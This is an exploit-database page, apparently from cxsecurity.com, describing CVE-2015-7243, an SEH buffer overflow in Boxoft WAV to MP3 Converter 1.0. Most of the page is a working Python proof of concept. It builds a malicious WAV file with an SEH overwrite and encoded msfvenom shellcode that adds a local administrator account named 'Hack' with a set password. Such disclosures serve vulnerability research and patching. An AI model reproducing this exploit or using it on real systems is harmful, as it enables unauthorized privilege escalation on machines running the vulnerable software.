Boxoft Wav To MP3 Converter 1.0 Buffer Overflow

Published
Credit
Risk
2016.06.02
Mandar
High
CWE
CVE
Local
Remote
CWE-119
CVE-2015-7243
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Exploit Title: Boxoft WAV to MP3 Converter - SEH Based Buffer Overflow Exploit
# Date: 31/5/2016
# Exploit Author: Mandar
# Vendor Homepage: http://www.boxoft.com/wav-to-mp3/
# Software Link: http://www.boxoft.com/wav-to-mp3/setup(free-wav-to-mp3).exe
# Version: Boxoft WAV to MP3 Converter v1.0
# Tested on: Windows XP SP3, Windows 7 SP1 (64 bit), Windows 8.1, Windows 10 (64 bit)
# CVE : CVE-2015-7243
# Reference : https://www.exploit-db.com/exploits/38035/
# Category: Local Exploit

# Steps to reproduce:
# - Run the Boxoft WAV to MP3 Converter and select batch convert mode and hit next
# - Add exploit.wav file (generated by the PoC) and hit the convert to mp3 option
# - User "Hack" (pass-Hack@123) will be added to the local administrative group.

#!/usr/bin/python

import sys, struct
file="exploit.wav"

junk = "\x41" * 4132 #offset to Next SEH
endofbuff = "\x42" * 5300 #junk
nseh = "\xeb\x06\x90\x90" # hop over SEH
seh = "\xd3\x24\x40\x00" # pop ecx pop ebp ret (C:\Program Files (x86)\Boxoft Wav to MP3 (freeware)\wavtomp3.exe)

#msfvenom -a x86 --platform windows -p windows/adduser USER=hack PASS=Hack@123 -e x86/shikata_ga_nai -b "\x00" EXITFUNC=process -f python

buf = ""
buf += "\xdb\xc0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x43\xb8\x27"
buf += "\x27\x79\xee\x31\x47\x19\x03\x47\x19\x83\xc7\x04\xc5"
buf += "\xd2\x85\x06\x8b\x1d\x76\xd7\xeb\x94\x93\xe6\x2b\xc2"
buf += "\xd0\x59\x9b\x80\xb5\x55\x50\xc4\x2d\xed\x14\xc1\x42"
buf += "\x46\x92\x37\x6c\x57\x8e\x04\xef\xdb\xcc\x58\xcf\xe2"
buf += "\x1f\xad\x0e\x22\x7d\x5c\x42\xfb\x0a\xf3\x73\x88\x46"
buf += "\xc8\xf8\xc2\x47\x48\x1c\x92\x66\x79\xb3\xa8\x31\x59"
buf += "\x35\x7c\x4a\xd0\x2d\x61\x76\xaa\xc6\x51\x0d\x2d\x0f"
buf += "\xa8\xee\x82\x6e\x04\x1d\xda\xb7\xa3\xfd\xa9\xc1\xd7"
buf += "\x80\xa9\x15\xa5\x5e\x3f\x8e\x0d\x15\xe7\x6a\xaf\xfa"
buf += "\x7e\xf8\xa3\xb7\xf5\xa6\xa7\x46\xd9\xdc\xdc\xc3\xdc"
buf += "\x32\x55\x97\xfa\x96\x3d\x4c\x62\x8e\x9b\x23\x9b\xd0"
buf += "\x43\x9c\x39\x9a\x6e\xc9\x33\xc1\xe4\x0c\xc1\x7f\x4a"
buf += "\x0e\xd9\x7f\xfb\x66\xe8\xf4\x94\xf1\xf5\xde\xd0\x0d"
buf += "\xbc\x43\x70\x85\x19\x16\xc0\xc8\x99\xcc\x07\xf4\x19"
buf += "\xe5\xf7\x03\x01\x8c\xf2\x48\x85\x7c\x8f\xc1\x60\x83"
buf += "\x3c\xe2\xa0\xe0\xaf\x78\x65\x82\x57\xe5\x59\x63\xcb"
buf += "\xc5\xf7\x1e\x7f\x25\x7d\x92\x1a\x57\x5d\x3c\x84\xf4"
buf += "\xf6\x9c\x0e\x9b\x6b\xb6\xce\x6a\x5e\x7b\xef\xa3\xdf"
buf += "\x3f\xab\x9b\xf9\x99\x13\xb5\x60\x92\x73\x25\x04\x39"
buf += "\x15\xd9\xbd\xcf\xba\x54\x32\x10\x04\xf2\xdf\x39\xe8"
buf += "\x93\x6c\xce\x86\x02\xe7\x41\x15\xb7\x27\xf6\xb8\x54"
buf += "\x43\x26\x14\xdb\xd7\x62\x6a"

nop = "\x90" * 10
payload = junk + nseh + seh + nop + buf + endofbuff

writeFile = open (file, "w")
writeFile.write( payload )
writeFile.close()


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com